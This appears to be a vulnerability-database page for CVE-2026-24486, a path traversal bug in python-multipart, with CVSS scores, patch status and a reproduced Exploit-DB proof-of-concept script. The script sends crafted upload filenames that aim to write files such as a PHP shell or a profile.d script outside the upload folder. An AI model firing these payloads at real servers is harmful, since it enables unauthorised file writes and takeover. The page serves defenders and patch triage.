VIR Vulnerability Intelligence Relay

CVE-2026-24486

unknown
Published 2026-01-26 ยท Modified 2026-02-04
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
1.0

Description

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workaround, avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.

Predictions

Exploit likelihood
65%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52543 webapps python python ยท 2 KB
jefersoncardoso.dev ยท 2026-04-30

Python-Multipart 0.0.22 - Path Traversal

python exploit Source: Exploit-DB 
# Exploit Title: Python-Multipart 0.0.22 - Path Traversal 
# Date: 2026-02-23
# Exploit Author: cardosource
# Vendor Homepage: https://github.com/Kludex/python-multipart
# Software Link: https://pypi.org/project/python-multipart/
# Version: < 0.0.22 (REQUIRED)
# Tested on: Ubuntu / Python 3.13.5 / Docker (as root for demo)
# CVE : CVE-2026-24486

"""
PoC for CVE-2026-24486: Path Traversal in python-multipart when UPLOAD_KEEP_FILENAME=True + UPLOAD_DIR is configured.
Allows arbitrary file write via malicious filename.

"""

import requests
import time
import os
import sys


TARGET_URL   = "http://localhost:8000/upload"   
SOURCE_FILE  = "/etc/hosts" # Small file to upload (content written to target)

if not os.path.exists(SOURCE_FILE):
    print(f"[!] Source file not found: {SOURCE_FILE}")
    sys.exit(1)

# Malicious filenames (payloads)
payloads = [
    "/tmp/poc-abs.txt",
    "/etc/poc-etc.txt",
    "/root/poc-root.txt",
    "../../var/www/html/shell.php",
    "../../etc/profile.d/mal.sh",
    "../../../tmp/poc-deep.txt",
    "../../etc/passwd%00.txt",
    "//etc//poc-double-slash.txt",
]

print("[*] CVE-2026-24486 PoC")
print(f"[*] Target: {TARGET_URL}")
print(f"[*] Using source file: {SOURCE_FILE}")
print(f"[*] Testing {len(payloads)} payloads...\n")

for i, filename in enumerate(payloads, 1):
    print(f"[{i}/{len(payloads)}] Testing: {filename}")
    
    try:
        files = {
            'file': (filename, open(SOURCE_FILE, 'rb'), 'text/plain')
        }
        
        r = requests.post(TARGET_URL, files=files, timeout=8)
        
        print(f"    Status: {r.status_code}")
        if r.text.strip():
            print(f"    Response: {r.text.strip()}")
        else:
            print("    Response: (empty)")
    
    except Exception as e:
        print(f"    Error: {e}")
    
    print("-" * 50)
    time.sleep(1.0)

print("\n[*] Done.")
print("Verify files in container:")
print("  docker exec -it vuln-poc find / -name '*poc*' -o -name '*shell*' 2>/dev/null")
print("\nMitigation:")
print("  - Upgrade: pip install python-multipart>=0.0.22")
print("  - Avoid UPLOAD_KEEP_FILENAME=True")
print("  - Sanitize: filename = os.path.basename(file.filename)")

OS impact
suse SUSE Affected 1 release
VersionStatusFixed in
โ€” Affected โ€”
debian Debian Mixed 5 releases
VersionStatusFixed in
trixie Fixed 0.0.20-1.1~deb13u1
sid Fixed 0.0.20-1.1
forky Fixed 0.0.20-1.1
bullseye Affected โ€”
bookworm Affected โ€”

Package impact
EcosystemPackageVulnerableFixed
python PyPIpython-multipart<0.0.220.0.22

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.